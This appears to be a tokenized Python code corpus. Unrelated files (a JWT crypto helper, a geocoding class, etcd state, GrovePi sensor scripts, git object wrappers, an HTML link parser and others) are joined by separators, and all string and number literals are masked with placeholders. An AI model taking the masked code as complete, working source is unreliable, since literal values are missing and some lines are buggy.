"""<STR_LIT>""" <EOL> ( hash_fn , _ ) , mod = JWA [ alg ] <EOL> header = dict ( ( add_header or { } ) . items ( ) + [ ( HEADER_ALG , alg ) ] ) <EOL> header , payload = map ( b64encode_url , map ( json_encode , ( header , claims ) ) ) <EOL> sig = b64encode_url ( hash_fn ( _jws_hash_str ( header , payload ) , jwk [ '<STR_LIT:k>' ] , <EOL> mod = mod ) ) <EOL> return JWS ( header , payload , sig ) <EOL> def verify ( jws , jwk , alg , validate_claims = True , expiry_seconds = None ) : <EOL> """<STR_LIT>""" <EOL> header , payload , sig = map ( b64decode_url , jws ) <EOL> header = json_decode ( header ) <EOL> if alg != header [ HEADER_ALG ] : <EOL> raise Error ( '<STR_LIT>' ) <EOL> ( _ , verify_fn ) , mod = JWA [ header [ HEADER_ALG ] ] <EOL> if not verify_fn ( _jws_hash_str ( jws . header , jws . payload ) , <EOL> jwk [ '<STR_LIT:k>' ] , sig , mod = mod ) : <EOL> raise Error ( '<STR_LIT>' ) <EOL> claims = json_decode ( b64decode_url ( jws . payload ) ) <EOL> _validate ( claims , validate_claims , expiry_seconds ) <EOL> return JWT ( header , claims ) <EOL> def b64decode_url ( istr ) : <EOL> """<STR_LIT>""" <EOL> istr = encode_safe ( istr ) <EOL> try : <EOL> return urlsafe_b64decode ( istr + '<STR_LIT:=>' * ( <NUM_LIT:4> - ( len ( istr ) % <NUM_LIT:4> ) ) ) <EOL> except TypeError as e : <EOL> raise Error ( '<STR_LIT>' % ( e ) ) <EOL> def b64encode_url ( istr ) : <EOL> """<STR_LIT>""" <EOL> return urlsafe_b64encode ( encode_safe ( istr ) ) . rstrip ( '<STR_LIT:=>' ) <EOL> def encode_safe ( istr , encoding = '<STR_LIT:utf8>' ) : <EOL> try : <EOL> return istr . encode ( encoding ) <EOL> except UnicodeDecodeError : <EOL> pass <EOL> return istr <EOL> def auth_tag ( hmac ) : <EOL> return hmac [ : len ( hmac ) // <NUM_LIT:2> ] <EOL> def pad_pkcs7 ( s ) : <EOL> sz = AES . block_size - ( len ( s ) % AES . block_size ) <EOL> return s + ( chr ( sz ) * sz ) <EOL> def unpad_pkcs7 ( s ) : <EOL> return s [ : - ord ( s [ - <NUM_LIT:1> ] ) ] <EOL> def encrypt_oaep ( plaintext , jwk ) : <EOL> return PKCS1_OAEP . new ( RSA . importKey ( jwk [ '<STR_LIT:k>' ] ) ) . encrypt ( plaintext ) <EOL> def decrypt_oaep ( ciphertext , jwk ) : <EOL> try : <EOL> return PKCS1_OAEP . new ( RSA . importKey ( jwk [ '<STR_LIT:k>' ] ) ) . decrypt ( ciphertext ) <EOL> except ValueError as e : <EOL> raise Error ( e . args [ <NUM_LIT:0> ] ) <EOL> def hmac_sign ( s , key , mod = SHA256 ) : <EOL> hmac = HMAC . new ( key , digestmod = mod ) <EOL> if not isinstance ( s , ( tuple , list ) ) : <EOL> s = ( s , ) <EOL> for item in s : <EOL> hmac . update ( item ) <EOL> return hmac . digest ( ) <EOL> def hmac_verify ( s , key , sig , mod = SHA256 ) : <EOL> hmac = HMAC . new ( key , digestmod = mod ) <EOL> if not isinstance ( s , ( tuple , list ) ) : <EOL> s = ( s , ) <EOL> for item in s : <EOL> hmac . update ( item ) <EOL> if not const_compare ( hmac . digest ( ) , sig ) : <EOL> return False <EOL> return True <EOL> def rsa_sign ( s , key , mod = SHA256 ) : <EOL> key = RSA . importKey ( key ) <EOL> hash = mod . new ( s ) <EOL> return PKCS1_v1_5_SIG . new ( key ) . sign ( hash ) <EOL> def rsa_verify ( s , key , sig , mod = SHA256 ) : <EOL> key = RSA . importKey ( key ) <EOL> hash = mod . new ( s ) <EOL> return PKCS1_v1_5_SIG . new ( key ) . verify ( hash , sig ) <EOL> def encrypt_aescbc ( plaintext , key , iv ) : <EOL> plaintext = pad_pkcs7 ( plaintext ) <EOL> return AES . new ( key , AES . MODE_CBC , iv ) . encrypt ( plaintext ) <EOL> def decrypt_aescbc ( ciphertext , key , iv ) : <EOL> return unpad_pkcs7 ( AES . new ( key , AES . MODE_CBC , iv ) . decrypt ( ciphertext ) ) <EOL> def const_compare ( stra , strb ) : <EOL> if len ( stra ) != len ( strb ) : <EOL> return False <EOL> res = <NUM_LIT:0> <EOL> for a , b in zip ( stra , strb ) : <EOL> res |= ord ( a ) ^ ord ( b ) <EOL> return res == <NUM_LIT:0> <EOL> class _JWA ( object ) : <EOL> """<STR_LIT>""" <EOL> _impl = { <EOL> '<STR_LIT>' : ( ( hmac_sign , hmac_verify ) , SHA256 ) , <EOL> '<STR_LIT>' : ( ( hmac_sign , hmac_verify ) , SHA384 ) , <EOL> '<STR_LIT>' : ( ( hmac_sign , hmac_verify ) , SHA512 ) , <EOL> '<STR_LIT>' : ( ( rsa_sign , rsa_verify ) , SHA256 ) , <EOL> '<STR_LIT>' : ( ( rsa_sign , rsa_verify ) , SHA384 ) , <EOL> '<STR_LIT>' : ( ( rsa_sign , rsa_verify ) , SHA512 ) , <EOL> '<STR_LIT>' : ( ( encrypt_oaep , decrypt_oaep ) , <NUM_LIT> ) , <EOL> '<STR_LIT>' : ( ( encrypt_aescbc , decrypt_aescbc ) , <NUM_LIT> ) , <EOL> '<STR_LIT>' : ( ( encrypt_aescbc , decrypt_aescbc ) , <NUM_LIT> ) , <EOL> '<STR_LIT>' : ( ( encrypt_aescbc , decrypt_aescbc ) , <NUM_LIT> ) , <EOL> } <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key in self . _impl : <EOL> return self . _impl [ key ] <EOL> enc , hash = self . _compound_from_key ( key ) <EOL> return self . _impl [ enc ] , self . _impl [ hash ] <EOL> def _compound_from_key ( self , key ) : <EOL> try : <EOL> enc , hash = key . split ( '<STR_LIT:+>' ) <EOL> return enc , hash <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> enc , hash = key . split ( '<STR_LIT:->' ) <EOL> return enc , hash <EOL> except ValueError : <EOL> pass <EOL> raise Error ( '<STR_LIT>' . format ( key ) ) <EOL> JWA = _JWA ( ) <EOL> COMPRESSION = { <EOL> '<STR_LIT>' : ( zlib . compress , zlib . decompress ) , <EOL> } <EOL> def _format_timestamp ( ts ) : <EOL> dt = datetime . datetime . utcfromtimestamp ( ts ) <EOL> return dt . isoformat ( ) + '<STR_LIT>' <EOL> def _check_expiration_time ( now , expiration_time ) : <EOL> if now >= expiration_time : <EOL> raise Expired ( '<STR_LIT>' . format ( <EOL> _format_timestamp ( expiration_time ) ) <EOL> ) <EOL> def _check_not_before ( now , not_before ) : <EOL> if not_before > now : <EOL> raise NotYetValid ( '<STR_LIT>' . format ( <EOL> _format_timestamp ( not_before ) ) <EOL> ) <EOL> def _validate ( claims , validate_claims , expiry_seconds ) : <EOL> """<STR_LIT>""" <EOL> if not validate_claims : <EOL> return <EOL> now = time ( ) <EOL> try : <EOL> expiration_time = claims [ CLAIM_EXPIRATION_TIME ] <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> _check_expiration_time ( now , expiration_time ) <EOL> try : <EOL> issued_at = claims [ CLAIM_ISSUED_AT ] <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> if expiry_seconds is not None : <EOL> _check_expiration_time ( now , issued_at + expiry_seconds ) <EOL> try : <EOL> not_before = claims [ CLAIM_NOT_BEFORE ] <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> _check_not_before ( now , not_before ) <EOL> def _jwe_hash_str ( ciphertext , iv , adata = '<STR_LIT>' , version = _TEMP_VER ) : <EOL> if not version : <EOL> return '<STR_LIT:.>' . join ( ( adata , iv , ciphertext , str ( len ( adata ) ) ) ) <EOL> elif version == <NUM_LIT:1> : <EOL> return '<STR_LIT:.>' . join ( ( adata , iv , ciphertext , pack ( "<STR_LIT>" , len ( adata ) * <NUM_LIT:8> ) ) ) <EOL> return '<STR_LIT>' . join ( ( adata , iv , ciphertext , pack ( "<STR_LIT>" , len ( adata ) * <NUM_LIT:8> ) ) ) <EOL> def _jws_hash_str ( header , claims ) : <EOL> return '<STR_LIT:.>' . join ( ( header , claims ) ) <EOL> def cli_decrypt ( jwt , key ) : <EOL> print decrypt ( deserialize_compact ( jwt ) , { '<STR_LIT:k>' : key } , <EOL> validate_claims = False ) <EOL> def _cli ( ) : <EOL> import inspect <EOL> import sys <EOL> from argparse import ArgumentParser <EOL> from copy import copy <EOL> parser = ArgumentParser ( ) <EOL> subparsers = parser . add_subparsers ( dest = '<STR_LIT>' ) <EOL> commands = { <EOL> '<STR_LIT>' : cli_decrypt , <EOL> } <EOL> for k , fn in commands . items ( ) : <EOL> p = subparsers . add_parser ( k ) <EOL> for arg in inspect . getargspec ( fn ) . args : <EOL> p . add_argument ( arg ) <EOL> args = parser . parse_args ( ) <EOL> handler = commands [ args . subparser_name ] <EOL> handler_args = [ getattr ( args , k ) for k in inspect . getargspec ( <EOL> handler ) . args ] <EOL> handler ( * handler_args ) </s>
<s> import re <EOL> import geocoder <EOL> from six import string_types <EOL> class Location ( object ) : <EOL> """<STR_LIT>""" <EOL> lat = None <EOL> lng = None <EOL> def __init__ ( self , location , ** kwargs ) : <EOL> self . location = location <EOL> self . kwargs = kwargs <EOL> self . _check_input ( location ) <EOL> @ property <EOL> def ok ( self ) : <EOL> return bool ( self . latlng ) <EOL> def _convert_float ( self , number ) : <EOL> try : <EOL> return float ( number ) <EOL> except ValueError : <EOL> return None <EOL> def _check_input ( self , location ) : <EOL> if isinstance ( location , string_types ) : <EOL> expression = r"<STR_LIT>" <EOL> pattern = re . compile ( expression ) <EOL> match = pattern . findall ( location ) <EOL> if len ( match ) == <NUM_LIT:2> : <EOL> lat , lng = match <EOL> self . _check_for_list ( [ lat , lng ] ) <EOL> else : <EOL> provider = self . kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> g = geocoder . get ( location , provider = provider ) <EOL> if g . ok : <EOL> self . lat , self . lng = g . lat , g . lng <EOL> elif isinstance ( location , ( list , tuple ) ) : <EOL> self . _check_for_list ( location ) <EOL> elif isinstance ( location , dict ) : <EOL> self . _check_for_dict ( location ) <EOL> elif hasattr ( location , '<STR_LIT>' ) : <EOL> if location . latlng : <EOL> self . lat , self . lng = location . latlng <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % location ) <EOL> def _check_for_list ( self , location ) : <EOL> if len ( location ) == <NUM_LIT:2> : <EOL> lat = self . _convert_float ( location [ <NUM_LIT:0> ] ) <EOL> lng = self . _convert_float ( location [ <NUM_LIT:1> ] ) <EOL> condition_1 = isinstance ( lat , float ) <EOL> condition_2 = isinstance ( lng , float ) <EOL> if condition_1 and condition_2 : <EOL> condition_3 = - <NUM_LIT> <= lat <= <NUM_LIT> <EOL> condition_4 = - <NUM_LIT> <= lng <= <NUM_LIT> <EOL> if condition_3 and condition_4 : <EOL> self . lat = lat <EOL> self . lng = lng <EOL> return self . lat , self . lng <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def _check_for_dict ( self , location ) : <EOL> if '<STR_LIT>' in location and '<STR_LIT>' in location : <EOL> lat = location [ '<STR_LIT>' ] <EOL> lng = location [ '<STR_LIT>' ] <EOL> self . _check_for_list ( [ lat , lng ] ) <EOL> if '<STR_LIT:y>' in location and '<STR_LIT:x>' in location : <EOL> lat = location [ '<STR_LIT:y>' ] <EOL> lng = location [ '<STR_LIT:x>' ] <EOL> self . _check_for_list ( [ lat , lng ] ) <EOL> @ property <EOL> def latlng ( self ) : <EOL> if isinstance ( self . lat , float ) and isinstance ( self . lng , float ) : <EOL> return [ self . lat , self . lng ] <EOL> return [ ] <EOL> @ property <EOL> def latitude ( self ) : <EOL> return self . lat <EOL> @ property <EOL> def longitude ( self ) : <EOL> return self . lng <EOL> @ property <EOL> def xy ( self ) : <EOL> if isinstance ( self . lat , float ) and isinstance ( self . lng , float ) : <EOL> return [ self . lng , self . lat ] <EOL> return [ ] <EOL> def __str__ ( self ) : <EOL> if self . ok : <EOL> return '<STR_LIT>' . format ( self . lat , self . lng ) <EOL> return '<STR_LIT>' <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> l = Location ( [ <NUM_LIT:0.0> , <NUM_LIT:0.0> ] ) <EOL> print ( l . lng ) </s>
<s> from flask . ext . script import Manager <EOL> from app import app <EOL> manager = Manager ( app ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> manager . run ( ) </s>
<s> import json <EOL> import socket <EOL> from etcdstate import EtcdState <EOL> from etcdpaths import getMachineStatePath <EOL> STATUS_RUNNING = '<STR_LIT>' <EOL> class MachineState ( EtcdState ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , project_name , machine_id , etcd_client ) : <EOL> path = getMachineStatePath ( project_name , machine_id ) <EOL> super ( MachineState , self ) . __init__ ( path , etcd_client ) <EOL> def registerMachine ( self , component_names , ttl = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> machine_state = { <EOL> '<STR_LIT:status>' : STATUS_RUNNING , <EOL> '<STR_LIT>' : component_names , <EOL> '<STR_LIT>' : socket . gethostbyname ( socket . gethostname ( ) ) <EOL> } <EOL> self . setState ( machine_state , ttl = ttl ) <EOL> def getStatus ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . getState ( { '<STR_LIT:status>' : '<STR_LIT>' } ) <EOL> def removeMachine ( self ) : <EOL> """<STR_LIT>""" <EOL> self . deleteState ( ) </s>
<s> '''<STR_LIT>''' <EOL> from grovepi import * <EOL> from grove_oled import * <EOL> dht_sensor_port = <NUM_LIT:7> <EOL> oled_init ( ) <EOL> oled_clearDisplay ( ) <EOL> oled_setNormalDisplay ( ) <EOL> oled_setVerticalMode ( ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> while True : <EOL> try : <EOL> [ temp , hum ] = dht ( dht_sensor_port , <NUM_LIT:1> ) <EOL> print ( "<STR_LIT>" , temp , "<STR_LIT>" , hum , "<STR_LIT:%>" ) <EOL> t = str ( temp ) <EOL> h = str ( hum ) <EOL> oled_setTextXY ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> oled_putString ( "<STR_LIT>" ) <EOL> oled_setTextXY ( <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> oled_putString ( "<STR_LIT>" ) <EOL> oled_putString ( t + '<STR_LIT:C>' ) <EOL> oled_setTextXY ( <NUM_LIT:3> , <NUM_LIT:0> ) <EOL> oled_putString ( "<STR_LIT>" ) <EOL> oled_putString ( h + "<STR_LIT:%>" ) <EOL> except ( IOError , TypeError ) as e : <EOL> print ( "<STR_LIT>" ) </s>
<s> '''<STR_LIT>''' <EOL> import grove_barometer_lib <EOL> b = grove_barometer_lib . barometer ( ) <EOL> while True ( ) : <EOL> print ( "<STR_LIT>" , b . temperature , "<STR_LIT>" , b . pressure , "<STR_LIT>" , b . altitude ) <EOL> b . update ( ) <EOL> time . sleep ( <NUM_LIT> ) </s>
<s> '''<STR_LIT>''' <EOL> import grove_gesture_sensor <EOL> import time <EOL> g = grove_gesture_sensor . gesture ( ) <EOL> g . init ( ) <EOL> while True : <EOL> gest = g . return_gesture ( ) <EOL> if gest == g . FORWARD : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . BACKWARD : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . RIGHT : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . LEFT : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . UP : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . DOWN : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . CLOCKWISE : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . ANTI_CLOCKWISE : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . WAVE : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == <NUM_LIT:0> : <EOL> print ( "<STR_LIT:->" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT> ) </s>
<s> '''<STR_LIT>''' <EOL> import time <EOL> import grovepi <EOL> sensor = <NUM_LIT:4> <EOL> grovepi . pinMode ( sensor , "<STR_LIT>" ) <EOL> while True : <EOL> try : <EOL> if grovepi . digitalRead ( sensor ) == <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> except IOError : <EOL> print ( "<STR_LIT>" ) </s>
<s> '''<STR_LIT>''' <EOL> import time <EOL> import grovepi <EOL> relay = <NUM_LIT:4> <EOL> grovepi . pinMode ( relay , "<STR_LIT>" ) <EOL> while True : <EOL> try : <EOL> grovepi . digitalWrite ( relay , <NUM_LIT:1> ) <EOL> print ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> grovepi . digitalWrite ( relay , <NUM_LIT:0> ) <EOL> print ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> except KeyboardInterrupt : <EOL> grovepi . digitalWrite ( relay , <NUM_LIT:0> ) <EOL> break <EOL> except IOError : <EOL> print ( "<STR_LIT>" ) </s>
<s> from babelfish import LanguageReverseConverter <EOL> from subliminal . exceptions import ConfigurationError <EOL> class TheSubDBConverter ( LanguageReverseConverter ) : <EOL> def __init__ ( self ) : <EOL> self . from_thesubdb = { '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , ) } <EOL> self . to_thesubdb = { v : k for k , v in self . from_thesubdb . items ( ) } <EOL> self . codes = set ( self . from_thesubdb . keys ( ) ) <EOL> def convert ( self , alpha3 , country = None , script = None ) : <EOL> if ( alpha3 , country ) in self . to_thesubdb : <EOL> return self . to_thesubdb [ ( alpha3 , country ) ] <EOL> if ( alpha3 , ) in self . to_thesubdb : <EOL> return self . to_thesubdb [ ( alpha3 , ) ] <EOL> raise ConfigurationError ( '<STR_LIT>' % ( alpha3 , country , script ) ) <EOL> def reverse ( self , thesubdb ) : <EOL> if thesubdb in self . from_thesubdb : <EOL> return self . from_thesubdb [ thesubdb ] <EOL> raise ConfigurationError ( '<STR_LIT>' % thesubdb ) </s>
<s> import urllib2 , cookielib <EOL> from bs4 import BeautifulSoup <EOL> urls = [ "<STR_LIT>" ] <EOL> for u in urls : <EOL> cj = cookielib . CookieJar ( ) <EOL> opener = urllib2 . build_opener ( urllib2 . HTTPCookieProcessor ( cj ) ) <EOL> request = urllib2 . Request ( u ) <EOL> request . add_header ( '<STR_LIT>' , "<STR_LIT:test>" ) <EOL> response = opener . open ( request ) <EOL> bs = BeautifulSoup ( response ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' </s>
<s> import csv <EOL> from datetime import datetime <EOL> from StringIO import StringIO <EOL> from collections import namedtuple <EOL> DATE_FMT = "<STR_LIT>" <EOL> Customer = namedtuple ( '<STR_LIT>' , ( '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:state>' , '<STR_LIT>' ) ) <EOL> def parse ( row ) : <EOL> """<STR_LIT>""" <EOL> row [ <NUM_LIT:0> ] = int ( row [ <NUM_LIT:0> ] ) <EOL> row [ <NUM_LIT:4> ] = datetime . strptime ( row [ <NUM_LIT:4> ] , DATE_FMT ) <EOL> return Customer ( * row ) <EOL> def split ( line ) : <EOL> """<STR_LIT>""" <EOL> reader = csv . reader ( StringIO ( line ) ) <EOL> return reader . next ( ) </s>
<s> from abc import ABCMeta , abstractmethod <EOL> from utils . system import run_command <EOL> from utils . date import time_to_utc <EOL> GIT_BLOB_OBJECT = '<STR_LIT>' <EOL> GIT_TREE_OBJECT = '<STR_LIT>' <EOL> GIT_COMMIT_OBJECT = '<STR_LIT>' <EOL> GIT_VALID_OBJECT_KINDS = [ GIT_BLOB_OBJECT , GIT_TREE_OBJECT , GIT_COMMIT_OBJECT ] <EOL> class GitObject : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = ABCMeta <EOL> @ abstractmethod <EOL> def __init__ ( self , repo , kind , rev ) : <EOL> assert repo is not None , '<STR_LIT>' <EOL> assert repo . is_valid ( ) , '<STR_LIT>' <EOL> self . repo = repo <EOL> self . kind = kind <EOL> self . rev = rev <EOL> def is_blob ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . kind == GIT_BLOB_OBJECT <EOL> def is_tree ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . kind == GIT_TREE_OBJECT <EOL> def is_commit ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . kind == GIT_COMMIT_OBJECT <EOL> def get_repo ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . repo <EOL> def get_kind ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . kind <EOL> def get_revision ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . rev <EOL> @ abstractmethod <EOL> def get_subject ( self ) : <EOL> pass <EOL> @ abstractmethod <EOL> def get_committer_date ( self ) : <EOL> pass <EOL> @ abstractmethod <EOL> def get_committer_email ( self ) : <EOL> pass <EOL> @ abstractmethod <EOL> def get_committer_name ( self ) : <EOL> pass <EOL> @ abstractmethod <EOL> def show ( self ) : <EOL> pass <EOL> class GitBlob ( GitObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , repo , path , rev = '<STR_LIT>' ) : <EOL> assert path is not None , '<STR_LIT>' <EOL> super ( GitBlob , self ) . __init__ ( repo , GIT_BLOB_OBJECT , rev ) <EOL> self . path = path <EOL> def get_path ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . path <EOL> def get_subject ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def get_committer_date ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) <EOL> return time_to_utc ( git_output . strip ( ) ) <EOL> def get_committer_email ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def get_committer_name ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def show ( self ) : <EOL> """<STR_LIT>""" <EOL> level = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> file_content = run_command ( cmd = '<STR_LIT>' . format ( level ) , data = None , location = self . repo . location , chw = True ) <EOL> return file_content <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . format ( self . path , self . rev , self . repo ) <EOL> class GitTree ( GitObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , repo , path , rev = '<STR_LIT>' ) : <EOL> assert path is not None , '<STR_LIT>' <EOL> super ( GitTree , self ) . __init__ ( repo , GIT_TREE_OBJECT , rev ) <EOL> self . path = path <EOL> def get_path ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . path <EOL> def get_subject ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def get_committer_date ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) <EOL> return time_to_utc ( git_output . strip ( ) ) <EOL> def get_committer_email ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def get_committer_name ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def show ( self ) : <EOL> """<STR_LIT>""" <EOL> level = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> cmd = '<STR_LIT>' . format ( level ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . split ( '<STR_LIT:\n>' ) [ : - <NUM_LIT:1> ] <EOL> tree_contents = [ ] <EOL> for item in git_output : <EOL> kind , path = item . split ( ) [ <NUM_LIT:1> ] , '<STR_LIT>' . format ( self . path , item . split ( ) [ <NUM_LIT:3> ] ) <EOL> if kind == GIT_BLOB_OBJECT : <EOL> tree_contents . append ( GitBlob ( repo = self . repo , path = path , rev = self . rev ) ) <EOL> elif kind == GIT_TREE_OBJECT : <EOL> tree_contents . append ( GitTree ( repo = self . repo , path = path , rev = self . rev ) ) <EOL> return tree_contents <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . format ( self . path , self . rev , self . repo ) <EOL> class GitCommit ( GitObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , repo , sha1_hash , rev = '<STR_LIT>' ) : <EOL> assert sha1_hash is not None , '<STR_LIT>' <EOL> super ( GitCommit , self ) . __init__ ( repo , GIT_COMMIT_OBJECT , rev ) <EOL> self . sha1_hash = sha1_hash <EOL> def get_sha1_hash ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . sha1_hash <EOL> def get_subject ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . sha1_hash ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def get_committer_date ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . sha1_hash ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) <EOL> return time_to_utc ( git_output . strip ( ) ) <EOL> def get_committer_email ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . sha1_hash ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def get_committer_name ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . sha1_hash ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def show ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . sha1_hash ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) <EOL> return git_output <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . format ( self . sha1_hash , self . rev , self . repo ) </s>
<s> import threading <EOL> from django . conf import settings <EOL> try : <EOL> from django . utils . html_parser import HTMLParser <EOL> except ImportError : <EOL> from HTMLParser import HTMLParser <EOL> update_lock = threading . Lock ( ) <EOL> class Lister ( HTMLParser ) : <EOL> def reset ( self ) : <EOL> HTMLParser . reset ( self ) <EOL> self . urls = [ ] <EOL> class URLLister ( Lister ) : <EOL> def __init__ ( self ) : <EOL> self . in_a = False <EOL> self . text = '<STR_LIT>' <EOL> self . url = '<STR_LIT>' <EOL> HTMLParser . __init__ ( self ) <EOL> def handle_starttag ( self , tag , attrs ) : <EOL> if tag == '<STR_LIT:a>' : <EOL> href = [ v for k , v in attrs if k == '<STR_LIT>' ] <EOL> if href : <EOL> self . in_a = True <EOL> self . url = href [ <NUM_LIT:0> ] <EOL> elif tag == '<STR_LIT>' and self . in_a : <EOL> src = [ v for k , v in attrs if k == '<STR_LIT:src>' ] <EOL> if src : <EOL> self . text += '<STR_LIT>' % src [ <NUM_LIT:0> ] <EOL> def handle_endtag ( self , tag ) : <EOL> if tag == '<STR_LIT:a>' and self . in_a : <EOL> self . urls . append ( ( self . text [ : <NUM_LIT> ] , self . url ) ) <EOL> self . in_a = False <EOL> self . text = '<STR_LIT>' <EOL> self . url = '<STR_LIT>' <EOL> def handle_data ( self , data ) : <EOL> if self . in_a : <EOL> self . text += data <EOL> class ImageLister ( Lister ) : <EOL> def handle_starttag ( self , tag , attrs ) : <EOL> if tag == '<STR_LIT>' : <EOL> src = [ v for k , v in attrs if k == '<STR_LIT:src>' ] <EOL> if src : <EOL> self . urls . append ( ( '<STR_LIT>' , src [ <NUM_LIT:0> ] ) ) <EOL> class AnchorLister ( HTMLParser ) : <EOL> def __init__ ( self ) : <EOL> self . names = [ ] <EOL> HTMLParser . __init__ ( self ) <EOL> def reset ( self ) : <EOL> HTMLParser . reset ( self ) <EOL> self . names = [ ] <EOL> def handle_starttag ( self , tag , attributes ) : <EOL> name = [ v for k , v in attributes if k == '<STR_LIT:id>' ] <EOL> if name : <EOL> self . names . append ( name [ <NUM_LIT:0> ] ) <EOL> if tag == '<STR_LIT:a>' : 